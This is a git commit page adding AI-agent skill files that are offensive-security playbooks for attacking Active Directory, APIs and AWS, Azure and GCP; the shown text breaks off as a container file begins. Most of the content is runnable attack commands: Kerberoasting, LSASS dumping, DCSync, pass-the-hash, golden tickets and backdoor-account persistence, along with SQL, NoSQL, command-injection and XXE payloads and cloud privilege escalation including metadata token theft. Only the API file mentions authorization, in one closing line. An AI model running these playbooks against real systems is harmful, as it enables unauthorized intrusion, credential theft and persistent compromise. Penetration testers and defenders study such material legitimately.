zhongwei/gh-trilwu-secskills-secskills
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Initial commit

Browse Source
This commit is contained in:
Zhongwei Li
2025-11-30 09:03:09 +08:00
commit 33a29e697a
25 changed files with 10078 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

342
skills/active-directory-attacks/SKILL.md Normal file
View File

@@ -0,0 +1,342 @@
---
name: attacking-active-directory
description: Attack and enumerate Active Directory environments using Kerberos attacks (Kerberoasting, ASREPRoasting), credential dumping (DCSync, Mimikatz), lateral movement (PtH, PtT), and BloodHound analysis. Use when pentesting Windows domains or exploiting AD misconfigurations.
---
# Attacking Active Directory
## When to Use
- AD reconnaissance and enumeration
- Kerberos-based attacks
- Credential dumping from domain controllers
- Lateral movement within domains
- BloodHound attack path analysis
- Domain persistence techniques
## Kerberoasting
**Windows:**
```powershell
# Check kerberoastable users
.\Rubeus.exe kerberoast /stats
# Roast all
.\Rubeus.exe kerberoast /outfile:hashes.txt
# Target specific user
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.txt
# Target admins only
.\Rubeus.exe kerberoast /ldapfilter:'(admincount=1)' /nowrap
```
**Linux:**
```bash
# Impacket GetUserSPNs
GetUserSPNs.py -request -dc-ip 10.10.10.10 domain.local/user:password -outputfile hashes.txt
# With NT hash
GetUserSPNs.py -request -dc-ip 10.10.10.10 -hashes :ntlmhash domain.local/user -outputfile hashes.txt
# Target specific user
GetUserSPNs.py -request-user svc_mssql -dc-ip 10.10.10.10 domain.local/user:password
```
**Crack Hashes:**
```bash
# Hashcat (TGS-REP)
hashcat -m 13100 hashes.txt wordlist.txt
# John
john --wordlist=wordlist.txt hashes.txt
```
## ASREPRoasting
**Windows:**
```powershell
# Enumerate vulnerable users
Get-DomainUser -PreauthNotRequired
# Roast
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
.\Rubeus.exe asreproast /user:victim /format:hashcat
```
**Linux:**
```bash
# With domain creds
GetNPUsers.py domain.local/user:password -request -format hashcat -outputfile hashes.txt
# Without creds (username list)
GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -outputfile hashes.txt -dc-ip 10.10.10.10
```
**Crack AS-REP:**
```bash
hashcat -m 18200 hashes.txt wordlist.txt
```
## BloodHound
**Data Collection:**
```powershell
# Windows - SharpHound
.\SharpHound.exe -c All --zipfilename output.zip
.\SharpHound.exe -c All,GPOLocalGroup
```
**Linux:**
```bash
# bloodhound-python
bloodhound-python -u user -p password -ns 10.10.10.10 -d domain.local -c All --zip
```
**Useful Queries:**
```cypher
# Shortest path to Domain Admins
MATCH p=shortestPath((n)-[*1..]->(m:Group {name:'DOMAIN ADMINS@DOMAIN.LOCAL'})) RETURN p
# Kerberoastable users
MATCH (u:User {hasspn:true}) RETURN u
# AS-REP Roastable
MATCH (u:User {dontreqpreauth:true}) RETURN u
# Unconstrained delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c
# DCSync rights
MATCH p=(n)-[:DCSync|AllExtendedRights|GenericAll]->(d:Domain) RETURN p
```
## Credential Dumping
**LSASS Dumping:**
```powershell
# Task Manager: Right-click lsass.exe -> Create dump file
# procdump
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# comsvcs.dll
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Temp\lsass.dmp full
# Parse offline with mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
```
**SAM Dumping:**
```cmd
# Save hives
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive
# Extract hashes (Linux)
secretsdump.py -sam sam.hive -system system.hive LOCAL
```
**DCSync (Domain):**
```bash
# secretsdump - dump all
secretsdump.py domain.local/user:password@dc.domain.local -just-dc
# Specific user
secretsdump.py domain.local/user:password@dc.domain.local -just-dc-user krbtgt
# With NTLM hash
secretsdump.py -hashes :ntlmhash domain.local/user@dc.domain.local -just-dc
```
## Pass-the-Hash
**Windows:**
```powershell
# Mimikatz
sekurlsa::pth /user:administrator /domain:domain.local /ntlm:hash /run:cmd.exe
```
**Linux:**
```bash
# CrackMapExec
crackmapexec smb 10.10.10.10 -u administrator -H hash
crackmapexec smb 10.10.10.10 -u administrator -H hash -x whoami
# psexec
psexec.py -hashes :hash administrator@10.10.10.10
# wmiexec
wmiexec.py -hashes :hash administrator@10.10.10.10
# evil-winrm
evil-winrm -i 10.10.10.10 -u administrator -H hash
```
## Pass-the-Ticket
**Export Tickets:**
```powershell
# Mimikatz
sekurlsa::tickets /export
# Rubeus
.\Rubeus.exe dump /nowrap
.\Rubeus.exe monitor /interval:10
```
**Import/Use Tickets:**
```powershell
# Mimikatz
kerberos::ptt ticket.kirbi
# Rubeus
.\Rubeus.exe ptt /ticket:base64ticket
# Verify
klist
```
**Linux PtT:**
```bash
# Convert kirbi to ccache
ticketConverter.py ticket.kirbi ticket.ccache
# Set ticket
export KRB5CCNAME=ticket.ccache
# Use ticket
psexec.py -k -no-pass domain.local/administrator@dc.domain.local
```
## Overpass-the-Hash
```powershell
# Rubeus - request TGT with NTLM hash
.\Rubeus.exe asktgt /user:administrator /domain:domain.local /rc4:hash /ptt
# With AES key (better OPSEC)
.\Rubeus.exe asktgt /user:administrator /domain:domain.local /aes256:key /ptt
```
## Golden/Silver Tickets
**Golden Ticket (TGT):**
```powershell
# Requirements: krbtgt hash, Domain SID
# Mimikatz
kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /ptt
# Rubeus
.\Rubeus.exe golden /rc4:hash /user:administrator /domain:domain.local /sid:S-1-5-21-... /ptt
```
**Silver Ticket (TGS):**
```powershell
# Requirements: Service account hash, Service SPN
# Mimikatz - CIFS service
kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /target:dc.domain.local /service:cifs /rc4:hash /ptt
```
## Lateral Movement
**CrackMapExec:**
```bash
# SMB spray
crackmapexec smb 10.10.10.0/24 -u user -p password
# Execute commands
crackmapexec smb 10.10.10.10 -u admin -p password -x whoami
crackmapexec smb 10.10.10.10 -u admin -H hash -x whoami
# Dump SAM
crackmapexec smb 10.10.10.10 -u admin -p password --sam
# Dump LSA
crackmapexec smb 10.10.10.10 -u admin -p password --lsa
```
**PSExec Variants:**
```bash
# psexec
psexec.py domain/user:password@10.10.10.10
# wmiexec (stealthier)
wmiexec.py domain/user:password@10.10.10.10
# smbexec (no service)
smbexec.py domain/user:password@10.10.10.10
```
**WinRM:**
```powershell
# PowerShell
Enter-PSSession -ComputerName dc.domain.local -Credential domain\user
```
```bash
# evil-winrm
evil-winrm -i 10.10.10.10 -u administrator -p password
evil-winrm -i 10.10.10.10 -u administrator -H hash
```
## Enumeration
**Domain Info:**
```powershell
# PowerView
Get-Domain
Get-DomainController
Get-DomainUser
Get-DomainComputer
Get-DomainGroup
Get-DomainGroupMember "Domain Admins"
```
**Linux Enumeration:**
```bash
# crackmapexec
crackmapexec smb 10.10.10.0/24 -u user -p password --users
crackmapexec smb 10.10.10.0/24 -u user -p password --groups
# ldapsearch
ldapsearch -x -H ldap://10.10.10.10 -D 'user@domain.local' -w 'password' -b "DC=domain,DC=local"
```
## Quick Workflow
1. **Initial Access** → Get domain credentials
2. **Enumeration** → Run BloodHound collection
3. **Kerberoasting** → Extract and crack service tickets
4. **Lateral Movement** → Use creds to move to high-value targets
5. **Credential Dumping** → Dump LSASS/SAM on compromised hosts
6. **DCSync** → Extract all domain hashes from DC
7. **Persistence** → Golden ticket or create backdoor accounts
## Common Wins
- Kerberoasting weak service account passwords
- ASREPRoasting accounts without preauth
- BloodHound finding short paths to DA
- Pass-the-Hash from dumped credentials
- DCSync with compromised accounts that have replication rights
## Tools
- **Rubeus** - Kerberos attacks (Windows)
- **Mimikatz** - Credential dumping (Windows)
- **Impacket** - Comprehensive toolkit (Linux)
- **BloodHound** - AD relationship graphing
- **CrackMapExec** - Swiss army knife for AD
- **PowerView** - AD enumeration (PowerShell)
- **evil-winrm** - WinRM access (Linux)
## References
- https://book.hacktricks.xyz/windows-hardening/active-directory-methodology
- https://github.com/fortra/impacket
- https://github.com/GhostPack/Rubeus
- https://github.com/BloodHoundAD/BloodHound

568
skills/api-security-testing/SKILL.md Normal file
View File

@@ -0,0 +1,568 @@
---
name: testing-apis
description: Test REST and GraphQL APIs for authentication bypasses, authorization flaws, IDOR, mass assignment, injection attacks, and rate limiting issues. Use when pentesting APIs or testing microservices security.
---
# API Security Testing Skill
You are an API security expert specializing in REST, GraphQL, and API pentesting. Use this skill when the user requests help with:
- REST API security testing
- GraphQL API exploitation
- API authentication bypass
- API authorization flaws
- Rate limiting bypass
- API fuzzing
- Mass assignment vulnerabilities
- API documentation discovery
## Core Methodologies
### 1. API Discovery and Reconnaissance
**Find API Endpoints:**
```bash
# Common API paths
/api/
/api/v1/
/api/v2/
/rest/
/graphql
/swagger
/api-docs
/swagger.json
/swagger.yaml
/openapi.json
/api/swagger-ui/
/api/docs
# Directory fuzzing for APIs
ffuf -u https://target.com/FUZZ -w api-wordlist.txt -mc 200,301,302,403
gobuster dir -u https://target.com -w api-paths.txt
# JavaScript analysis
# Extract API endpoints from JS files
cat app.js | grep -Eo "(GET|POST|PUT|DELETE|PATCH)\s+['\"]([^'\"]+)"
```
**API Documentation:**
```bash
# Swagger/OpenAPI
curl https://target.com/swagger.json
curl https://target.com/v2/swagger.json
curl https://target.com/api-docs
# Check for exposed docs
https://target.com/docs
https://target.com/api/docs
https://target.com/swagger-ui/
https://target.com/redoc
```
**Subdomain Enumeration for APIs:**
```bash
# Common API subdomains
api.target.com
api-dev.target.com
api-staging.target.com
api-prod.target.com
rest.target.com
graphql.target.com
# Subdomain fuzzing
ffuf -u https://FUZZ.target.com -w subdomains.txt
```
### 2. REST API Testing
**HTTP Methods Testing:**
```bash
# Check all HTTP methods
curl -X GET https://api.target.com/users/1
curl -X POST https://api.target.com/users
curl -X PUT https://api.target.com/users/1
curl -X DELETE https://api.target.com/users/1
curl -X PATCH https://api.target.com/users/1
curl -X HEAD https://api.target.com/users/1
curl -X OPTIONS https://api.target.com/users/1
# Check for method override
curl -X POST https://api.target.com/users/1 -H "X-HTTP-Method-Override: DELETE"
curl -X POST https://api.target.com/users/1 -H "X-Method-Override: PUT"
```
**Authentication Testing:**
```bash
# No authentication
curl https://api.target.com/users
# Bearer token
curl https://api.target.com/users -H "Authorization: Bearer TOKEN"
# Basic auth
curl -u username:password https://api.target.com/users
# API key
curl https://api.target.com/users?api_key=KEY
curl https://api.target.com/users -H "X-API-Key: KEY"
# JWT token
curl https://api.target.com/users -H "Authorization: Bearer eyJhbGc..."
```
**IDOR (Insecure Direct Object Reference):**
```bash
# Test sequential IDs
curl https://api.target.com/users/1
curl https://api.target.com/users/2
curl https://api.target.com/users/100
# Test UUIDs
curl https://api.target.com/users/550e8400-e29b-41d4-a716-446655440000
# Test with different users
# User A's token accessing User B's data
curl https://api.target.com/users/2 -H "Authorization: Bearer USER_A_TOKEN"
```
**Mass Assignment:**
```bash
# Modify request to include unexpected fields
# Original: {"username":"test","email":"test@test.com"}
# Modified: {"username":"test","email":"test@test.com","role":"admin","is_admin":true}
curl -X POST https://api.target.com/users \
-H "Content-Type: application/json" \
-d '{"username":"hacker","email":"hack@test.com","role":"admin","is_admin":true}'
# Common fields to try
# role, is_admin, admin, user_level, permissions, credits, balance
```
**Excessive Data Exposure:**
```bash
# Check response for sensitive data
curl https://api.target.com/users | jq
# Look for:
# - Password hashes
# - Internal IDs
# - Email addresses
# - API keys
# - Tokens
# - PII
```
### 3. GraphQL API Testing
**GraphQL Discovery:**
```bash
# Common GraphQL endpoints
/graphql
/graphql/console
/graphql/graphiql
/graphiql
/api/graphql
/v1/graphql
# Introspection query (check if enabled)
curl https://api.target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"{ __schema { types { name } } }"}'
```
**GraphQL Introspection:**
```graphql
# Full introspection query
{
__schema {
types {
name
fields {
name
type {
name
kind
}
}
}
}
}
# Query specific type
{
__type(name: "User") {
name
fields {
name
type {
name
}
}
}
}
```
**GraphQL Queries:**
```bash
# Basic query
curl https://api.target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"{ users { id username email } }"}'
# Query with variables
curl https://api.target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"query($id: Int!) { user(id: $id) { username email } }","variables":{"id":1}}'
# Mutation
curl https://api.target.com/graphql \
-H "Content-Type: application/json" \
-d '{"query":"mutation { updateUser(id: 1, role: \"admin\") { id role } }"}'
```
**GraphQL Vulnerabilities:**
```bash
# Test for IDOR
{"query":"{ user(id: 2) { id email password } }"}
# Test for mass assignment
{"query":"mutation { updateUser(id: 1, role: \"admin\", isAdmin: true) }"}
# Batch queries (DoS potential)
{"query":"{ user1: user(id: 1) { id } user2: user(id: 2) { id } ... }"}
# Deep nested queries (DoS)
{"query":"{ user { posts { comments { user { posts { comments { ... } } } } } }"}
# Alias abuse
{"query":"{ a: users { id } b: users { id } c: users { id } ... }"}
```
### 4. Authorization Testing
**Horizontal Privilege Escalation:**
```bash
# User A trying to access User B's resources
# Get User A's token
TOKEN_A=$(curl -X POST https://api.target.com/login -d '{"username":"userA","password":"passA"}' | jq -r .token)
# Try to access User B's data with User A's token
curl https://api.target.com/users/2 -H "Authorization: Bearer $TOKEN_A"
curl https://api.target.com/users/2/orders -H "Authorization: Bearer $TOKEN_A"
```
**Vertical Privilege Escalation:**
```bash
# Regular user trying to access admin functions
# Get regular user token
TOKEN_USER=$(curl -X POST https://api.target.com/login -d '{"username":"user","password":"pass"}' | jq -r .token)
# Try admin endpoints
curl https://api.target.com/admin/users -H "Authorization: Bearer $TOKEN_USER"
curl -X DELETE https://api.target.com/admin/users/1 -H "Authorization: Bearer $TOKEN_USER"
```
**Function Level Authorization:**
```bash
# Test all endpoints with different user roles
# - Unauthenticated
# - Low-privilege user
# - Medium-privilege user
# - Admin user
# Endpoints to test
GET /api/admin/*
POST /api/admin/*
DELETE /api/admin/*
PUT /api/admin/*
```
### 5. Rate Limiting and DoS
**Test Rate Limits:**
```bash
# Rapid requests
for i in {1..1000}; do
curl https://api.target.com/expensive-endpoint &
done
# Check response headers
curl -I https://api.target.com/endpoint
# Look for:
# X-RateLimit-Limit
# X-RateLimit-Remaining
# X-RateLimit-Reset
# Retry-After
```
**Rate Limit Bypass:**
```bash
# Change IP (X-Forwarded-For, X-Real-IP)
curl https://api.target.com/endpoint -H "X-Forwarded-For: 1.2.3.4"
curl https://api.target.com/endpoint -H "X-Real-IP: 1.2.3.4"
curl https://api.target.com/endpoint -H "X-Originating-IP: 1.2.3.4"
# Change User-Agent
curl https://api.target.com/endpoint -H "User-Agent: Different-Agent"
# Add junk parameters
curl https://api.target.com/endpoint?random=123
curl https://api.target.com/endpoint?random=456
# Case manipulation
curl https://api.target.com/Endpoint
curl https://api.target.com/ENDPOINT
```
### 6. API Fuzzing
**Parameter Fuzzing:**
```bash
# ffuf for parameter discovery
ffuf -u https://api.target.com/endpoint?FUZZ=test -w parameters.txt
# Arjun
arjun -u https://api.target.com/endpoint
# Test various inputs
curl https://api.target.com/users?id=1
curl https://api.target.com/users?id=../../etc/passwd
curl https://api.target.com/users?id=<script>alert(1)</script>
curl https://api.target.com/users?id=' OR '1'='1
```
**Fuzzing with wfuzz:**
```bash
# POST data fuzzing
wfuzz -z file,wordlist.txt -d "username=FUZZ&password=test" https://api.target.com/login
# Header fuzzing
wfuzz -z file,wordlist.txt -H "X-Custom-Header: FUZZ" https://api.target.com/endpoint
```
**Content-Type Confusion:**
```bash
# Try different content types
curl -X POST https://api.target.com/endpoint \
-H "Content-Type: application/json" \
-d '{"user":"admin"}'
curl -X POST https://api.target.com/endpoint \
-H "Content-Type: application/xml" \
-d '<user>admin</user>'
curl -X POST https://api.target.com/endpoint \
-H "Content-Type: application/x-www-form-urlencoded" \
-d 'user=admin'
# Send JSON to XML endpoint and vice versa
```
### 7. API Security Tools
**Burp Suite:**
```bash
# Send requests to Repeater for manual testing
# Use Intruder for fuzzing
# Scan with active/passive scanner
# Use extensions: Autorize, AuthMatrix, JWT4B
```
**Postman:**
```bash
# Import API collection
# Test all endpoints
# Use environment variables for tokens
# Create test scripts
# Export collection for collaboration
```
**OWASP ZAP:**
```bash
# Automated API scan
zap-cli quick-scan https://api.target.com
# Spider API
zap-cli spider https://api.target.com
# Active scan
zap-cli active-scan https://api.target.com
```
**API-specific Tools:**
```bash
# RESTler (Microsoft) - REST API fuzzer
git clone https://github.com/microsoft/restler-fuzzer
python3 restler.py --api_spec swagger.json
# Kiterunner - API endpoint discovery
kr scan https://target.com -w routes.txt
# Nuclei with API templates
nuclei -u https://api.target.com -t ~/nuclei-templates/api/
```
### 8. API Injection Attacks
**SQL Injection:**
```bash
# In query parameters
curl "https://api.target.com/users?id=1' OR '1'='1"
curl "https://api.target.com/users?id=1 UNION SELECT password FROM admin--"
# In JSON body
curl -X POST https://api.target.com/search \
-H "Content-Type: application/json" \
-d '{"query":"test\' OR \'1\'=\'1"}'
```
**Command Injection:**
```bash
# In parameters
curl "https://api.target.com/ping?host=8.8.8.8;whoami"
curl "https://api.target.com/ping?host=8.8.8.8|id"
# In JSON
curl -X POST https://api.target.com/diagnostic \
-H "Content-Type: application/json" \
-d '{"command":"ping;whoami"}'
```
**NoSQL Injection:**
```bash
# MongoDB injection
curl -X POST https://api.target.com/login \
-H "Content-Type: application/json" \
-d '{"username":{"$ne":null},"password":{"$ne":null}}'
curl -X POST https://api.target.com/login \
-H "Content-Type: application/json" \
-d '{"username":"admin","password":{"$regex":".*"}}'
```
**XXE in XML APIs:**
```bash
# If API accepts XML
curl -X POST https://api.target.com/endpoint \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<user><name>&xxe;</name></user>'
```
### 9. API Documentation Analysis
**Swagger/OpenAPI Analysis:**
```bash
# Download spec
curl https://api.target.com/swagger.json > swagger.json
# Analyze with jq
cat swagger.json | jq '.paths'
cat swagger.json | jq '.definitions'
# Extract all endpoints
cat swagger.json | jq -r '.paths | keys[]'
# Find parameters
cat swagger.json | jq '.paths[].get.parameters'
```
### 10. API Security Checklist
**Authentication:**
- [ ] Test without authentication
- [ ] Test with invalid tokens
- [ ] Test with expired tokens
- [ ] Test token in URL vs header
- [ ] Check for authentication bypass
**Authorization:**
- [ ] Test IDOR vulnerabilities
- [ ] Test horizontal privilege escalation
- [ ] Test vertical privilege escalation
- [ ] Test function-level authorization
- [ ] Test missing authorization checks
**Input Validation:**
- [ ] Test SQL injection
- [ ] Test NoSQL injection
- [ ] Test command injection
- [ ] Test XXE
- [ ] Test XSS in API responses
**Business Logic:**
- [ ] Test mass assignment
- [ ] Test excessive data exposure
- [ ] Test rate limiting
- [ ] Test resource exhaustion
- [ ] Test business logic flaws
**Configuration:**
- [ ] Check for exposed documentation
- [ ] Check security headers
- [ ] Check CORS configuration
- [ ] Check error messages (info disclosure)
- [ ] Check debug endpoints
## Quick Testing Commands
**Test Endpoint:**
```bash
# GET request
curl -v https://api.target.com/endpoint
# POST with JSON
curl -X POST https://api.target.com/endpoint \
-H "Content-Type: application/json" \
-d '{"key":"value"}'
# With authentication
curl https://api.target.com/endpoint \
-H "Authorization: Bearer TOKEN"
# See full response
curl -i https://api.target.com/endpoint
```
## Troubleshooting
**CORS Issues:**
```bash
# Check CORS headers
curl -H "Origin: https://evil.com" https://api.target.com/endpoint
# Look for:
# Access-Control-Allow-Origin: *
# Access-Control-Allow-Credentials: true
```
**Rate Limited:**
```bash
# Add delays between requests
for i in {1..100}; do curl https://api.target.com/endpoint; sleep 1; done
# Try bypass techniques (X-Forwarded-For, etc.)
```
## Reference Links
- OWASP API Security Top 10: https://owasp.org/www-project-api-security/
- HackTricks API Testing: https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/graphql
- API Security Best Practices: https://github.com/OWASP/API-Security
- PayloadsAllTheThings API: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/API%20Key%20Leaks
## When to Use This Skill
Activate this skill when the user asks to:
- Test REST or GraphQL APIs
- Find API vulnerabilities
- Bypass API authentication/authorization
- Discover API endpoints
- Test API business logic
- Perform API fuzzing
- Analyze API documentation
- Help with API penetration testing
Always ensure proper authorization before testing any API.

526
skills/cloud-security/SKILL.md Normal file
View File

@@ -0,0 +1,526 @@
---
name: exploiting-cloud-platforms
description: Exploit AWS, Azure, and GCP cloud misconfigurations including S3 buckets, IAM roles, metadata services, serverless functions, and cloud-specific privilege escalation. Use when pentesting cloud environments or assessing cloud security.
---
# Exploiting Cloud Platforms
## When to Use
- AWS, Azure, or GCP security assessment
- Cloud misconfiguration exploitation
- S3/Blob/Storage bucket hunting
- Cloud IAM privilege escalation
- Serverless function exploitation
- Cloud metadata service abuse
## AWS Security
### AWS CLI Setup
```bash
# Configure credentials
aws configure
# Or export directly
export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
export AWS_DEFAULT_REGION=us-east-1
# Test credentials
aws sts get-caller-identity
# List available regions
aws ec2 describe-regions
```
### S3 Bucket Enumeration
```bash
# List buckets
aws s3 ls
# List bucket contents
aws s3 ls s3://bucket-name/
aws s3 ls s3://bucket-name/ --recursive
# Download bucket contents
aws s3 sync s3://bucket-name/ ./local-folder/
# Check public access
aws s3api get-bucket-acl --bucket bucket-name
aws s3api get-bucket-policy --bucket bucket-name
# Test unauthenticated access
aws s3 ls s3://bucket-name/ --no-sign-request
curl https://bucket-name.s3.amazonaws.com/
```
**S3 Bucket Discovery:**
```bash
# Common naming patterns
company-backup
company-data
company-dev
company-prod
company-logs
company-assets
# Tools
# s3scanner
python3 s3scanner.py buckets.txt
# S3 Inspector
python3 s3inspector.py --bucket-file buckets.txt
```
### IAM Enumeration
```bash
# Current user info
aws sts get-caller-identity
# List IAM users (if allowed)
aws iam list-users
# List user policies
aws iam list-attached-user-policies --user-name username
aws iam list-user-policies --user-name username
# Get policy details
aws iam get-policy --policy-arn arn:aws:iam::aws:policy/PolicyName
aws iam get-policy-version --policy-arn arn --version-id v1
# List roles
aws iam list-roles
# List groups
aws iam list-groups
```
### EC2 Enumeration
```bash
# List instances
aws ec2 describe-instances
# Get instance metadata (from instance)
curl http://169.254.169.254/latest/meta-data/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name
# List security groups
aws ec2 describe-security-groups
# List key pairs
aws ec2 describe-key-pairs
# List snapshots
aws ec2 describe-snapshots --owner-ids self
# Public snapshots by account
aws ec2 describe-snapshots --owner-ids 123456789012 --restorable-by-user-ids all
```
### Lambda Functions
```bash
# List functions
aws lambda list-functions
# Get function code
aws lambda get-function --function-name function-name
# Invoke function
aws lambda invoke --function-name function-name output.txt
# Get function configuration
aws lambda get-function-configuration --function-name function-name
```
### RDS Enumeration
```bash
# List DB instances
aws rds describe-db-instances
# List DB snapshots
aws rds describe-db-snapshots
# Check if publicly accessible
aws rds describe-db-instances --query 'DBInstances[*].[DBInstanceIdentifier,PubliclyAccessible]'
```
### Secrets Manager
```bash
# List secrets
aws secretsmanager list-secrets
# Get secret value
aws secretsmanager get-secret-value --secret-id secret-name
```
### CloudTrail (Logging)
```bash
# Check if CloudTrail is enabled
aws cloudtrail describe-trails
# Check trail status
aws cloudtrail get-trail-status --name trail-name
# Get recent events
aws cloudtrail lookup-events
```
### AWS Privilege Escalation
**Common Misconfigurations:**
```bash
# iam:CreatePolicyVersion - modify existing policies
# iam:SetDefaultPolicyVersion - set older policy version
# iam:PassRole + lambda:CreateFunction - execute code as role
# iam:AttachUserPolicy - attach admin policy to self
# iam:PutUserPolicy - add inline policy to self
# iam:CreateAccessKey - create keys for other users
# iam:UpdateAssumeRolePolicy - modify trust relationships
```
**Exploitation Examples:**
```bash
# Create access key for admin user (if iam:CreateAccessKey)
aws iam create-access-key --user-name admin-user
# Attach admin policy (if iam:AttachUserPolicy)
aws iam attach-user-policy --user-name current-user --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
# PassRole + Lambda
aws lambda create-function --function-name evil --runtime python3.9 --role arn:aws:iam::ACCOUNT:role/AdminRole --handler lambda_function.lambda_handler --zip-file fileb://function.zip
aws lambda invoke --function-name evil output.txt
```
## Azure Security
### Azure CLI Setup
```bash
# Login
az login
# Login with service principal
az login --service-principal -u APP_ID -p PASSWORD --tenant TENANT_ID
# Get current account
az account show
# List subscriptions
az account list
```
### Blob Storage Enumeration
```bash
# List storage accounts
az storage account list
# List containers
az storage container list --account-name accountname
# List blobs
az storage blob list --container-name containername --account-name accountname
# Download blob
az storage blob download --container-name containername --name filename --account-name accountname
# Check public access
az storage container show --name containername --account-name accountname
# Test unauthenticated access
curl https://accountname.blob.core.windows.net/container/file
```
**Blob Discovery:**
```bash
# Common patterns
companyname
companyname-backup
companyname-data
companyname-files
# MicroBurst (PowerShell)
Invoke-EnumerateAzureBlobs -Base company
```
### VM Enumeration
```bash
# List VMs
az vm list
# List VM images
az vm image list
# Get VM details
az vm show --resource-group RG --name VMname
# List NICs
az network nic list
# List public IPs
az network public-ip list
```
### Azure AD Enumeration
```bash
# List users
az ad user list
# Get current user
az ad signed-in-user show
# List groups
az ad group list
# List service principals
az ad sp list
# List applications
az ad app list
```
### Function Apps
```bash
# List function apps
az functionapp list
# Get function app details
az functionapp show --name functionappname --resource-group RG
# List functions
az functionapp function list --name functionappname --resource-group RG
# Download function code
az functionapp deployment source config-zip --name functionappname --resource-group RG
```
### Key Vault
```bash
# List key vaults
az keyvault list
# List secrets
az keyvault secret list --vault-name vaultname
# Get secret
az keyvault secret show --name secretname --vault-name vaultname
```
### Azure Metadata Service
```bash
# From Azure VM
curl -H Metadata:true "http://169.254.169.254/metadata/instance?api-version=2021-02-01"
# Get access token
curl -H Metadata:true "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"
```
## GCP Security
### gcloud Setup
```bash
# Login
gcloud auth login
# Login with service account
gcloud auth activate-service-account --key-file=key.json
# Get current account
gcloud config list
# List projects
gcloud projects list
```
### Storage Bucket Enumeration
```bash
# List buckets
gsutil ls
# List bucket contents
gsutil ls gs://bucket-name/
# Download files
gsutil cp gs://bucket-name/file.txt ./
# Check bucket permissions
gsutil iam get gs://bucket-name/
# Test unauthenticated access
curl https://storage.googleapis.com/bucket-name/file.txt
```
**Bucket Discovery:**
```bash
# Common patterns
company-backup
company-data
company_backup
company_data
# GCPBucketBrute
python3 gcpbucketbrute.py -k company
```
### Compute Engine
```bash
# List instances
gcloud compute instances list
# Get instance details
gcloud compute instances describe instance-name --zone=zone
# List disks
gcloud compute disks list
# List snapshots
gcloud compute snapshots list
# List firewall rules
gcloud compute firewall-rules list
```
### IAM Enumeration
```bash
# List service accounts
gcloud iam service-accounts list
# Get IAM policy
gcloud projects get-iam-policy PROJECT_ID
# List roles
gcloud iam roles list
# Describe role
gcloud iam roles describe roles/editor
```
### Cloud Functions
```bash
# List functions
gcloud functions list
# Describe function
gcloud functions describe function-name --region=region
# Download source code (if accessible)
gcloud functions describe function-name --region=region --format="value(sourceArchiveUrl)"
```
### GCP Metadata Service
```bash
# From GCP VM
curl "http://metadata.google.internal/computeMetadata/v1/?recursive=true" -H "Metadata-Flavor: Google"
# Get access token
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token" -H "Metadata-Flavor: Google"
# Get service account email
curl "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/email" -H "Metadata-Flavor: Google"
```
## Cloud Exploitation Tools
**AWS:**
```bash
# Pacu - AWS exploitation framework
python3 pacu.py
# ScoutSuite - Security auditing
python3 scout.py aws
# Prowler - Security assessment
./prowler -M csv
# WeirdAAL - AWS attack library
python3 weirdAAL.py
```
**Azure:**
```bash
# MicroBurst - PowerShell toolkit
Import-Module MicroBurst.psm1
Invoke-EnumerateAzureBlobs
Invoke-EnumerateAzureSubDomains
# ScoutSuite
python3 scout.py azure
# ROADtools - Azure AD
roadrecon auth
roadrecon gather
roadrecon gui
```
**GCP:**
```bash
# ScoutSuite
python3 scout.py gcp
# GCP-IAM-Privilege-Escalation
# Check for privilege escalation paths
```
## Quick Cloud Wins
**AWS:**
- Public S3 buckets with sensitive data
- Overly permissive IAM policies
- Unencrypted snapshots
- Public RDS instances
- Lambda functions with secrets in environment variables
- EC2 metadata service abuse (SSRF)
**Azure:**
- Public blob storage containers
- Overly permissive RBAC
- Exposed Key Vault secrets
- Public-facing VMs with weak credentials
- Function apps with hardcoded secrets
**GCP:**
- Public storage buckets
- Overly permissive IAM bindings
- Public compute instances
- Service account key exposure
- Cloud Functions with secrets in code
## Common Cloud Misconfigurations
1. **Public Storage** - S3/Blob/GCS buckets with public read/write
2. **Excessive Permissions** - Overly permissive IAM/RBAC policies
3. **Exposed Secrets** - Keys/passwords in code, environment variables
4. **No MFA** - Critical accounts without multi-factor authentication
5. **Open Security Groups** - 0.0.0.0/0 access on sensitive ports
6. **Unencrypted Data** - Storage/databases without encryption
7. **Default Credentials** - Services using default passwords
8. **Exposed Metadata** - SSRF to cloud metadata services
9. **Public Snapshots** - EBS/disk snapshots publicly accessible
10. **CloudTrail Disabled** - No logging of API calls
## References
- https://book.hacktricks.xyz/pentesting-web/buckets
- https://github.com/RhinoSecurityLabs/pacu
- https://github.com/NetSPI/MicroBurst
- https://github.com/nccgroup/ScoutSuite
- https://cloudsecdocs.com/

365
skills/container-security/SKILL.md Normal file
View File

@@ -0,0 +1,365 @@
---
name: exploiting-containers
